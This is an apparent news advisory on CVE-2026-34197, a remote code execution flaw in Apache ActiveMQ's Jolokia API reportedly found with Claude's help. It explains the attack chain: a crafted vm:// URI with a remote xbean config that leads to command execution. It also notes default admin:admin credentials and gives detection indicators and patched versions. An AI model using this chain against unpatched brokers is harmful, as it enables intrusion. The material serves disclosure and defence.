AI Uncovers 13-Year-Old Critical RCE Vulnerability in Apache ActiveMQ
A critical remote code execution (RCE) vulnerability, designated as CVE-2026-34197, has been identified in Apache ActiveMQ Classic. This flaw, which remained undetected for over a decade, was discovered by Anthropic’s AI model, Claude, in under 10 minutes.
Vulnerability Details
The vulnerability resides in ActiveMQ Classic’s Jolokia JMX-HTTP bridge, accessible via the web console at `/api/jolokia/` on port 8161. It allows authenticated attackers to invoke the `addNetworkConnector(String)` management operation on the broker’s MBean, supplying a crafted VM transport URI with an attacker-controlled `brokerConfig=xbean:http://` parameter.
When processed, ActiveMQ’s VM transport layer creates an embedded broker by calling `BrokerFactory.createBroker()` using the attacker-supplied URL. The `xbean:` scheme then hands the URL to Spring’s `ResourceXmlApplicationContext`, which instantiates all bean definitions in the remote XML file. This process enables arbitrary OS command execution via Spring’s `MethodInvokingFactoryBean` to invoke `Runtime.getRuntime().exec()`.
Root Cause Analysis
The root cause traces back to a remediation for CVE-2022-41678, where Apache added a blanket Jolokia allow rule for all operations on ActiveMQ’s own MBeans (`org.apache.activemq:`) to preserve web console functionality. This decision inadvertently exposed every management operation, including `addNetworkConnector`, as an attack surface through Jolokia’s REST API.
Authentication Concerns
While CVE-2026-34197 requires valid credentials in most deployments, default credentials (`admin:admin`) are widely present across enterprise environments. More critically, organizations running ActiveMQ versions 6.0.0 through 6.1.1 are exposed to a fully unauthenticated RCE path. A separate flaw, CVE-2024-32114, inadvertently stripped authentication constraints from the `/api/` path in those versions, meaning the Jolokia endpoint requires zero credentials, making CVE-2026-34197 a no-auth RCE on those builds.
Historical Context
ActiveMQ has a well-documented history of being targeted in the wild. Both CVE-2016-3088 (authenticated RCE via the web console) and CVE-2023-46604 (unauthenticated RCE via the broker port) are listed on CISA’s Known Exploited Vulnerabilities (KEV) catalog.
AI’s Role in Discovery
Researchers at Horizon3.ai credited Anthropic’s Claude AI with identifying the flaw during an AI-assisted source code review. By providing Claude with a lightweight vulnerability-hunting prompt and a live target for validation, the team enabled the AI to trace the multi-component attack chain spanning Jolokia, JMX, network connectors, and VM transports in approximately 10 minutes. Analysts noted this chain would likely have taken a skilled human researcher an entire week to map manually, underscoring how AI models are fundamentally lowering the barrier for vulnerability research.
Mitigation Measures
Organizations should monitor ActiveMQ broker logs for entries referencing `vm://` URIs containing `brokerConfig=xbean:http`, POST requests to `/api/jolokia/` with `addNetworkConnector` in the body, and unexpected outbound HTTP connections from the ActiveMQ process. Defenders should also watch for unusual child processes spawned by the ActiveMQ JVM.
The vulnerability is patched in ActiveMQ Classic versions 5.19.4 and 6.2.3. The fix removes the ability for `addNetworkConnector` to register `vm://` transports via the Jolokia API entirely. All organizations running affected versions should update immediately and audit deployments for default credential usage across all ActiveMQ instances.
